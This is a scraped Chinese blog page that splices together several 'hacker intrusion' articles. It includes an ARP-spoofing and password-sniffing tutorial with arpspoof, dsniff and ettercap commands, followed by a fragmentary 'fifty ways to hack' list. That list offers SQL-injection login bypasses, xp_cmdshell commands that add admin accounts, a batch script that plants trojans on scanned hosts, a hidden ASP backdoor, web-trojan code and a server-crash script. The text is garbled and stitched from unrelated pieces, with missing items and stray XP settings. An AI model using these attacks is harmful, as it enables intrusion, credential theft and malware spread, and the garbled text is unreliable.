黑客入侵 - 认识黑客入侵的利器 嗅探软件
嗅探器(也称网络分析器)是种能够察看网络传输、将其解码并为网管提供可用的数据的一种软件。网管可以使用它提供的数据来诊断网络存在的问题。而恶意用户还会利用嗅探器来从网络上获取存储在文本中的密码。下面列举一些常用的专用嗅探器:NAI嗅探器(商用)、WIRESHARK(以前叫Ethereal,是一种Linux,Windows以及其他平台上使用的开发源码的图形用户界面的嗅探器)、 TCPDump(开放源码命令行嗅探器,在Unix类的操作系统上使用,如Linux或者FreeBSD),还有它的Windows版——Windump。
首先我们来说明一下一些网络基本知识。大多数的以太网都是一根总线的拓扑结构,使用同轴电缆或者双绞线和hub连通。网络上的所有节点(计算机和其他设备)都可以通过同样的线路通信,并且使用称为载波监听多路访问/冲突检测(CSMA/CD)的方案依次发送数据。你可以把CSMA/CD看作是在一个很吵闹的宴会中的两人对话,你需要等一会儿,等别人说话的间歇才有机会发言。网络上的所有节点都有自己唯一的MAC(媒体访问控制)地址,他们使用该地址互相发送信息包。通常,节点只会关注目的地是自己的MAC地址的那些信息包。但是如果网卡被设置成混杂模式的话,那它就会察看它连接的线路上的所有数据包。
为了减少冲突数量、降低嗅探不属于某节点的数据的可能性,大多数网络都使用了交换机。在网络中,hub是种无源设备,它会将接收到的所有传输发送到它的所有端口。而交换机则察看它所连接的所有节点的MAC地址以及所在端口,然后把那些数据包只发给它的目标节点。交换机大大降低了网路中的冲突数量,增大了网络的吞吐量。理论上,使用交换机的网络中,每个节点只能收到广播消息(发给局域网上所有计算机的消息)以及专门发送给它的MAC地址的数据包,还有偶尔出现的不知道目标地址的数据包。但是即使在局域网中使用交换机,它还是有可能被人使用某些交换机上的镜像端口而嗅探(这些镜像端口本来是网管分析网络问题时使用的),嗅探者可以误导交换机使其将数据映射给所有端口或者使用一种称为ARP病毒的技术(后面会详细讲到)。
以上讲述的是以太网络的一些基本知识,而WiFi(801.11a/801.11b/801.11g/801.11n)则与之完全不同。无线局域网很像使用hub的以太局域网。局域网中所有计算机都能看到发送给别的计算机的数据,但通常他们可以设置成忽略这些信息。(事实上,比这复杂,但是我篇幅有限,就不详细讲那错综复杂的80.211网络了)。但如果网卡是设置成混杂模式的话,那么它就不会忽略发送给其他计算机的数据,而是会察看这些数据,允许使用嗅探器的用户看到附在同一访问点的发送给其他用户的数据。混杂模式在Windows和Linux (或者其他类似Unix的操作系统)的有线网卡上运行得很有效,但是并不是所有的无线网卡都能很好地支持该模式(比如Intel的叫做IPW2200的 Centrino 802.11g芯片)。如果嗅探器的网卡不支持混杂模式,那么嗅探者就得把它附到无线网络的WAP(无线接入点)上才能看到其他数据。如果攻击者使用的是 Linux(或者类似Unix的操作系统),如果网卡支持的话,它可能可以使用监听模式。在监听模式下,无线网卡直接监听无线电波中的原始信息包而无需WAP的辅助。从攻击者角度看,监听模式的好处是:由于不需要WAP,他们的活动不会留下任何痕迹,也不用在网络上发送数据包。
由于WiFi网络使用的安全协议各有不同,因此嗅探WiFi网络变得更加复杂。如果你的网卡支持混杂模式并且你能使用WEP(也就是说你知道WEP密钥)连接到无线网络,你就可以嗅探几乎所有你想要获得的信息。如果网络使用的是WPA,就没那么容易了,因为即使你知道密码,你也不一定能解码那些你没有参与的网络对话中的所有数据。但是,你却有可能进行ARP病毒攻击或者使用其它的MitM(有人参与其中)攻击,从而获得数据路由。
网管们应当注意嗅探器的很多合法用途。网管可以用它们找出网络上出问题的计算机,比如占用太多带宽,网络设置错误或者正在运行恶意软件等等。我觉得它们在找出黑客攻击方面非常有用,我可以用它们嗅探自己的服务器找出那些不正常的传输。学会用嗅探器来找出网络的问题的话,每个系统管理员都能很好地完成自己的工作,我推荐你们使用Wireshark,因为它是免费的、跨平台的并且能够找到大量的相关资料(可以从本文结尾的链接中找到更多信息)。
那些想要绕过安全措施的人也可以用嗅探器。很多流行的应用协议把登陆凭证(用户名和密码)以纯文本的形式传递或者使用加密性差的形式传送。这些不安全的协议包括FTP、Telnet、POP3、SMTP还有HTTP基本验证。这种情况下应尽量使用替代它们的SFTP,SSH(安全保护套件),以及 HTTPS(SSL)。也许你很难从FTP协议切换到别的协议,因为使用像SFTP这样更安全的协议的客户端并不一定总是有。较新版本的Windows(命令行的ftp.exe以及图形用户界面形式的浏览器)都支持FTP客户端,但是你也可以下载支持SFTP的FileZilla和PSFTP的免费客户端。有些嗅探器拥有很强的提取密码的能力,比如Cain,Dsniff以及Ettercap。这三个都是免费或者开放源码的。Cain只支持Windows而Dsniff和Ettercap通常在Unix环境中运行,但也有相应的Windows版本。
ARP欺骗/ARP病毒
ARP是指地址解析协议,它允许网络将IP地址解析成MAC地址。基本上,ARP是这样工作的:当某个使用局域网IP的主机想要与另一台主机联络的时候,它需要那台主机的MAC地址。首先,它会查询自己的ARP缓存(想要查看你的ARP缓存,在命令行中输入ARP),看看是否已经知道那台主机的MAC 地址,如果没有,它会发出广播ARP请求,询问谁拥有我正在找的主机的IP地址? 如果拥有该地址的主机收到该ARP请求,它就会用自己的MAC地址响应,于是两台主机就可以使用IP进行对话了。通常,在像以太网这样使用Hub或者 801.11b标准的总线网络中,所有NICS(网络接口卡)为混杂模式的主机都能收到所有的传输,但是在使用交换机的网络中却有所不同。交换机会查看发送给它的数据,并只把数据包传给它的目标MAC地址所属主机。使用交换机的网络更安全一些并且能够提高网速,因为它只把数据包发给需要去的地方。但是仍然有突破这种网络的方法。使用Arpspoof(Dsniff的部分功能),Ettercap或者Cain我们就可以欺骗局域网中的其他主机,告诉它们,我们就是它们要找的那个主机,把它们传输通过我们来转发。
即使是使用交换机的网络,攻击者也可以很容易地从恢复启动CD中使用 Dsniff或者Ettercap,来进行ARP欺骗并将传输转为通过它们来进行。这些工具甚至能够自动解析出用户名和密码,这给使用者提供极大的便利。如果攻击者在网关和FTP服务器之间进行ARP欺骗,那么它就能嗅探传输并在用户试图从站点外获取数据的时候提取用户名和密码,使用SMTP和POP3也是一样。即使是用SFTP、SSL以及SSH,仍然可以用Ettercap嗅探密码,因为该工具可以代理那些类型的连接。用户可能会收到警告说,他们试图获得的服务器的公共密钥已经被修改,或者可能不合法,但是我们中有多少人只是将那些信息关闭而根本不读呢
图1中的图片说明了ARP欺骗/ARP病毒如何工作的。基本上,攻击者跟Alan的电脑说,他就是Brain的电脑,反之亦然。这样,攻击者把Alan和Brain之间的网络传输全部接收过来了。一旦攻击者在两个节点之间进行了ARP欺骗,他就可以用任何他喜欢的工具进行嗅探(TCPDump、Wireshark、Ngrep等等)。在网关和电脑之间进行ARP欺骗的话,攻击者可以看到电脑正在发送和从网上接收的所有数据。本文中我只会讲到如何使用这些工具。
使用Dsniff和Ettercap快速演示ARP欺骗
让我们从dug Song的、支持Dsniff的ARPspoof程序开始吧。我使用的Unix版本,但是你可以找到Win32版本的。运行Dsniff最简单的方法就是从恢复启动CD启动。首先你应该确定包转发已经开启,不然我们的机器会丢弃所有我们想要嗅探的主机之间的传输,导致服务无响应。我用的一些工具会自动进行这项工作(比如Ettercap),但是保险起见,你也许会希望自己来做这件事。根据操作系统的不同,你可以使用如下的命令:
Linux:
echo 1 > /proc/sys/net/ipv4/ip_forward
BSD:
sysctl -w net.inet.ip.forwarding=1
现在你的计算机将把转发所有的传输,现在你可以开始ARP欺骗了。我们假设你想要嗅探一个主机和网关之间的所有传输,这样你就可以看到它发送到网络上的所有数据。如果想要获得双向的所有传输,你应当使用如下2个命令行:
arpspoof -t 192.168.1.1 192.168.1.2 & >/dev/null
arpspoof -t 192.168.1.2 192.168.1.1 & >/dev/null
“& >/dev/nul”部分是为了使它在终端运行起来更容易,但是为了debug,你可能想要忽略它。现在你可以使用你想要的任何套件来嗅探连接。新手的话,我推荐使用Dsniff,它支持ARPspoof来嗅探纯文本密码。用Dsniff开始嗅探,你只需退出到命令窗口并输入:
dsniff
Dsniff找到用户名和密码后,它会将它们显示在屏幕上。如果你想要查看所有其他传输,我推荐你使用TCPDump或者 Wireshark。如果想要停止ARP欺骗,输入如下命令:
killall arpspoof
这会关闭上面启动的2个Arpspoof。
另一个很棒的工具是Ettercap,它相当于ARP病毒和密码嗅探界的瑞士军刀。我通常在非互动模式中使用它,但是默认情况下它的交互界面非常友好,使用起来很方便。如果你想要使用Ettercap来进行ARP病毒,你可以使用下面示范的命令例句。如果我们的目标是网络上的所有主机,想要嗅探每个节点之间的所有传输,我们可以用下列命令:
ettercap -T -q -M ARP // //
你应当谨慎的使用上面那段命令,因为如果把一个大网络中所有的传输都通过一台很慢的计算机的话,那么这很有可能使整个网络连接瘫痪。
我们可以找个替罪羊,来看看Ip地址为192.168.1.1的主机,我们可以使用如下命令:
ettercap -T -q -M ARP /192.168.1.1/ //
如果192.168.1.1是网关,我们应该可以看到所有的输出传输。下面是这些命令行选项的功能:
-T 告诉Ettercap使用文字界面,我最喜欢这个选项,因为GUI模式太复杂了。
-q 让Ettercap安静些,换句话说就是少些冗长的文字报告。
-M 让Ettercap我们想要使用的MITM(人参与其中)方式,本例中是ARP病毒。
其他工具
我还想说很多其他的工具。首先就是Cain,这个Windows用户会觉得很好用。总之,它功能强大,操作简单。
如果你喜欢漂亮的图形界面,Cain就是你很好的选择之一。它不像Ettercap那么多选项,但是很酷也有很多Windows附加功能。
还有为了查看特定内容的专门的嗅探器。Driftnet能够分析出人们上网看到的图片。
这些也是嗅探器比如P0f,它让你被动得知网络传输的操作系统。
以上说的只是众多专门的嗅探器中的一小部分,仅仅是冰山的一角。
减轻嗅探攻击的危害
人们可以使用不少方法来缓解嗅探攻击的危害:
1.不使用像HTTp验证以及Telnet这些不安全的协议。事实上,你应当嗅探自己的网络,看看这些工具都列出了哪些能提取的密码。
2.如果你不得不使用不安全的协议,那你最好能把敏感信息加密后再传送出去。
3.察看临界工作站和服务器之间的静态ARP表。这种方法不易维持,但是可以限制arp欺骗。
4.运行ARPWatch等软件来检测你的网络物理地址,看看它是不是变成指向嗅探器的了。
5.运行Sniffdet和Sentinel来检测网卡是否出于混杂模式,是否运行了嗅探软件。
6.让从外部进入你的设备的、使用Wi-Fi的笔记本使用VPN来连接到网络。
7.锁住工作站,这样用户就无法安装嗅探软件或者像KNOPPIX那样从CD运行嗅探软件。
8.把员工工作站和服务器与公共终端隔离到不同的局域网中。
希望这篇文章能给你提供些许帮助。
黑客入侵 - 黑客入侵网络的五十种方法
现在网上的攻击事件越来越多,黑客都是通过什么方法来攻击我们的呢?下面我们给大家总结了黑客入侵网络的五十种方法,让大家做到有备无患。
1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络
3.登陆框用户名和密码输入’or’=’or’ 漏洞很老但是现在很是遍地都是
4.我们先到www.google.com底下搜索一下co net mib ver 1.0
6.http://www.wyyfk.com/24小时挂qq工具
net localgroup administrators还是可以看出guest是管理员来
http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59
http://www.microsoft.com/library/toolbar/3.0/search.aspx?view=en-us&charset=iso-8859-1&qu=
8.ms05016攻击工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上QQ大盗木马
9.有SA权限sqlserver数据库、并且能sql注入支持fso+asp的服务器
文章地址 http://hack123.home4u.china.com/0601.htm
http://wpa.qq.com/msgrd?v=1&uin=对方的qq号&site=ioshenmue&menu=yes
使用方法:把代码中的红色的“********”星号换成你想与其聊天的qq号后复 制到浏览器的地址栏处即可。无论他是否你的好友,你无须加他为好友就能给 他发qq消息。
12.软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂qq等
在baidu 搜索powered by: sailingstudio website manage system 5.0 (sp1)
利用动画看http://soft.77169.com/62/20050530/6824.html
17.天意商务系统网上依然有 有漏洞 网站具体的样式http://www.wzgcc.org/
地址栏里,填上天意商务系统的网址就可以了,注意一定要是主页面
18.sql注入时工具---internet选项---高级里找到显示友好的错误信息勾去掉
19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽,几乎发现不了
http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811
尝试恢复exec sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’
exec sp_oacreate ’wscript.shell’,@o out
exec sp_oamethod @o,’run’,null,’cmd.exe /c net user ating ating /add’ 再提到管理员
21.批量种植木马.bat
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$Content$nbsp;复制木马到扫描的计算机当中
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
22.搜索 powered by discuz!4.0.0rc3 开放头像的可利用 工具地址www.hack6.com
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
(2) (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
在命令行方式下使用windows自带的脚本宿主程序CScript.exe调用脚本,例如:
c:\>cscript rots.vbs [服务端口] [/r]
如果要对本地使用,ip地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用 ""表示)。
(4)下载DameWare NT Utilities 3.66.0.0 注册版
地址www.netsill.com/dwmrcw36600.zip
安装注册完毕后输入对方ip用户名密码,等待出现是否安装的对话框点是。
在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入 后在启动终端服务上打上勾。确定自动提示重起,重起后ok
(5)大家最常用的 3389.exe 下载地址www.hack6.com 把程序上传到肉鸡运行后重启既可
一般跟别人聊天 如果是对方先对你说话 那么她的ip显示出来的概率就大
当然如果是我们找对方 可以先跟她说发过去消息之后 然后关闭窗口等待她的回复
还可以用天网防火墙选择上udp数据保检测,即可拦截到对方ip
49.挂马js代码document.write(’’);保存到js页面里 可让所有页面挂马
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
黑客入侵 - 浅谈黑客入侵的四条途径与防护
要想有效的防范黑客对我们电脑的入侵和破坏,仅仅被动的安装防火墙是显然不够的,我们更应该了解一些常见的黑客入侵手法,针对不同的方法采取不同的措施,做到有的放矢。
应对措施:提高防范意识,不要随意运行别人发来的软件。安装木马查杀软件,及时更新木马特征库。推荐使用the cleaner,木马克星。
微软在win2000,xp中设置的这个功能对个人用户来说几乎毫无用处。反而成了黑客入侵nt架构操作系统的一条便利通道。如果你的操作系统存在不安全的口令,那就更可怕了。一条典型的入侵流程如下:
应对措施:禁用server服务, Task Scheduler服务,去掉网络文件和打印机共享前的对勾(插入图1)。
黑客入侵 - 洞悉黑客避开检测所使手段 防范黑客入侵
这篇文章的主要目的不是揭示黑客新的攻击手法,而是对那些黑客所用到的逃避检测的手法以及他们可能留下的证据做描述。这些手段的欺骗性很大,所以想检测到它们也更加的困难。
要知道攻击者是如何躲过这种匹配检测的,请参考以下作为恶意攻击者策略一部分的请求。要确定msadc目录是否存在,攻击者可能键入以下内容:
[root@localhost/root]#nc-n10.0.2.5580
GET/msadcHTTP/1.0
在下面这种情况中,我们看到攻击者达到了同样的目的,但是这次他使用了代理服务器。
攻击者
[root@10.1.1.1/]#nc-v216.234.161.8380
HEAD
黑客入侵 - 黑客入侵XP常用的七种方法
这里将向你揭示黑客入侵Windows XP操作系统常用的七种方法。
提示:部分设计不完善的屏幕保护程序没有屏蔽系统的“Ctrl+Alt+Del”的组合键,因此需要设置完成之后测试一下程序是否存在这个重大Bug。
此后,我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。
接下来我们用“记事本”打开folder.htt,这是用HTML语言编写的一个文件,发挥你的想像力尽情地修改吧。
当然,你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果,然后只要将原文件拷贝到下面这段文字的后面,覆盖掉原文件中“~”之间的内容就可以了。
*ThisfilewasautomaticallygeneratedbyMicrosoftInternetEXPlorer5.0
*usingthefile%THISDIRPATH%\folder.htt.
在“本地计算机策略”中,逐级展开“用户配置→管理模板→任务栏和开始菜单”分支,在右侧窗口中提供了“任务栏”和“开始菜单”的有关策略。
1)在策略列表窗口中用鼠标双击“从开始菜单中删除我的文档图标”选项。
2)在弹出窗口的“设置”标签中,选择“已启用”单选按钮,然后单击“确定”即可。
倘若隐藏桌面上的系统图标,传统的方法是通过采用修改注册表的方式来实现,这势必造成一定的风险性,采用组策略编辑器,即可方便快捷地达到此目的。
如果你不希望其他用户访问计算机的控制面板,你只要运行组策略编辑器,并在左侧窗口中展开“本地计算机策略→用户配置→管理模板→控制面板”分支,然后将右侧窗口的“禁止访问控制面板”策略启用即可。
提示:如果你想从上下文菜单的属性项目中选择一个“控制面板”项目,会出现一个消息,说明该设置防止这个操作。
第六招、设置用户权限
当多人共用一台计算机时,在WindowsXP中设置用户权限,可以按照以下步骤进行:
2)在编辑器窗口的左侧窗口中逐级展开“计算机配置→Windows设置→安全设置→本地策略→用户权限指派”分支。
3)双击需要改变的用户权限,单击“添加用户或组”按钮,然后双击想指派给权限的用户账号,最后单击“确定”按钮退出。
1)在组策略窗口中,逐级展开右侧窗口中的“计算机配置→Windows设置→安全设置→本地策略”分支,然后在该分支下选择“审核策略”选项。
3)用鼠标右键单击想要审核的文件或文件夹,选择弹出菜单的“属性”命令,接着在弹出的窗口中选择“安全”标签。
倘若对一个新组或用户设置审核,可以单击“添加”按钮,并且在“名称”框中键入新用户名,然后单击“确定”按钮打开“审核项目”对话框。
要查看或更改原有的组或用户审核,可以选择用户名,然后单击“查看/编辑”按钮。
要删除原有的组或用户审核,可以选择用户名,然后单击“删除”按钮即可。
6)如有必要的话,在“审核项目”对话框中的“应用到”列表中选取你希望审核的地方。
7)如果想禁止目录树中的文件和子文件夹继承这些审核项目,选择“仅对此容器内的对象和/或容器应用这些审核项”复选框。
黑客入侵 - 认识黑客入侵的利器 嗅探软件相关推荐
- 认识黑客入侵的利器 嗅探软件逐个了解
嗅探器(也称网络分析器)是种能够察看网络传输.将其解码并为网管提供可用的数据的一种软件.网管可以使用它提供的数据来诊断网络存在的问题.而恶意用户还会利用嗅探器来从网络上获取存储在文本中的密码.下面列举 ...
- 黑客入侵 - 认识黑客入侵的利器 嗅探软件 黑客入侵 - 黑客入侵网络的五十种方法
http://blog.csdn.net/linxingqianglai/article/details/51018389
- 2010最新黑客VIP入侵教程大集合 脚本入侵动画 网站入侵 批量135抓肉鸡
第一课脚本入侵动画:实验环境之虚拟机的搭建 教程下载地址:http://vip.hack95.com/jhk/xuniji.rar 第二课脚本入侵动画:个人电脑优化配置推荐方案(上) 教程下载地址:h ...
- 一觉醒来2T硬盘数据化为乌有,背后或是两名黑客在竞争式入侵
博雯 发自 凹非寺 量子位 报道 | 公众号 QbitAI 一觉醒来,几个T的硬盘数据化为乌有. 不说暗无天日吧,也至少是惨绝人寰了. 毫不夸张的说,上周四的6月24日,西部数据硬盘的My Book ...
- 黑客与票贩子联手入侵185个政府网站
手法:雇用黑客入侵政府网站,同时组织假证贩子高价售卖假证 范围:165名犯罪嫌疑人落网,被黑政府网站涉及30个省市自治区 案值:300多万条个人隐私资料数据被盗卖,涉案金额超过3亿 185个国内政府网 ...
- 史上最牛黑客:我是如何入侵摩托罗拉的
Kevin Mitnick(凯文•米特尼克),世界公认的头号黑客,第一个被FBI通缉的电脑黑客,他的传奇故事不仅在于如何入侵FBI和Sun.Novel和摩托罗拉的网站,更出名是他和FBI的探员们玩的猫 ...
- 剖析入侵技术 嗅探软件了解
如果我告诉我的同事说我正在 嗅探 网络,他们会觉得我在开玩笑.嗅探器(也称网络分析器)是种能够察看网络传输.将其解码并为网管提供可用的数据的一种软件.网管可以使用它提供的数据来诊断网络存在的问题.而恶 ...
- 白帽黑客入门,每天一个黑客技巧实现黑客的自我突破 !(附工具包)
时间一晃而过,今年的HW没机会也没技术参加,有的甚至还在入门徘徊,不是不想学,大部分是有心无力不知道怎么学,没方向,没实用的教学-怎么破局? 参加HW的前提,你必须拥有独立挖漏洞的能力,但或许你却还在 ...
- 如何入门黑客技术,黑客技术入门该学什么?
你是否曾经也对黑客技术感兴趣呢?感觉成为黑客是一件很酷的事,那么作为新手如何入门黑客技术,黑客技术入门该学什么呢? 其实不管你想在哪个新的领域里有所收获,你需要考虑以下几个问题 首先你要想明白为什么学 ...
- 如何去学会黑客技术,黑客电脑技术学习必备知识
或许你并不想成为一个黑客而是好奇,或许你只是为了高超的技术.无论是什么都需要刻苦的去学习,没有什么事情是不付出努力就能轻易成功的,之所以叫成功是因为那个人拥有着与众不同的本领,如果你想拥有超群的本领就 ...
最新文章
- 计算机组成原理2套题,计算机组成原理试卷及答案2套.doc
- python 、example
- OpenCASCADE绘制测试线束:几何命令之预测
- 在c#中将debug/release下文件打包成一个可直接运行exe文件
- mysql datetime最小值_MySQL的5种时间类型的比较
- android 车辆轨迹,Android自定义view实现车载可调整轨迹线
- 《Web测试囧事》——1.3 测试Web Service能否正常提供JSON数据
- allegro中10mil过孔_Allegro中增加过孔的方法
- 浏览器处理 前台传递的+时出现问题
- jep3.5 java 动态公式
- 金角大王 python_【51CTO学院三周年】 老男孩python全栈心路
- 数据结构_C语言_实验三_图 ——六度空间
- 运维工程师从月薪 5K 到 50K,中间都经历了什么?
- 程序猿段子:程序员崩溃很简单,改三次需求即可
- Linux /usr、/usr/share、/etc介绍
- 样本量太小怎么做结构方程模型?
- 反催收凉透 马上、平安普惠、招联、中银消费金融等联手打击
- 关于使用EasyExcel进行单元格合并的问题
- 【NDN基础】Networking Named Content 问题汇总
- Java常见的线程池有哪些?
热门文章
- java单号生成器_订单号生成工具类 - Yaphis的个人页面 - OSCHINA - 中文开源技术交流社区...
- 蓝鲸ERP标准版-进销存-采购管理子系统操作说明1
- Java开发不得不会!java私塾初级模拟银源代码
- Unity3D button控件
- ad中电容用什么封装_【AD封装】贴片插件晶振(带3D)
- Linux命令拆分csv文件,linux – 如何剪切CSV文件
- 联想键盘sk8821的Fn功能键
- 【180929】仿微信飞机大战游戏源码
- 解决趋势OfficeScan11自动显示隐藏文件等问题
- webx框架升级springboot遇到的问题及解决方案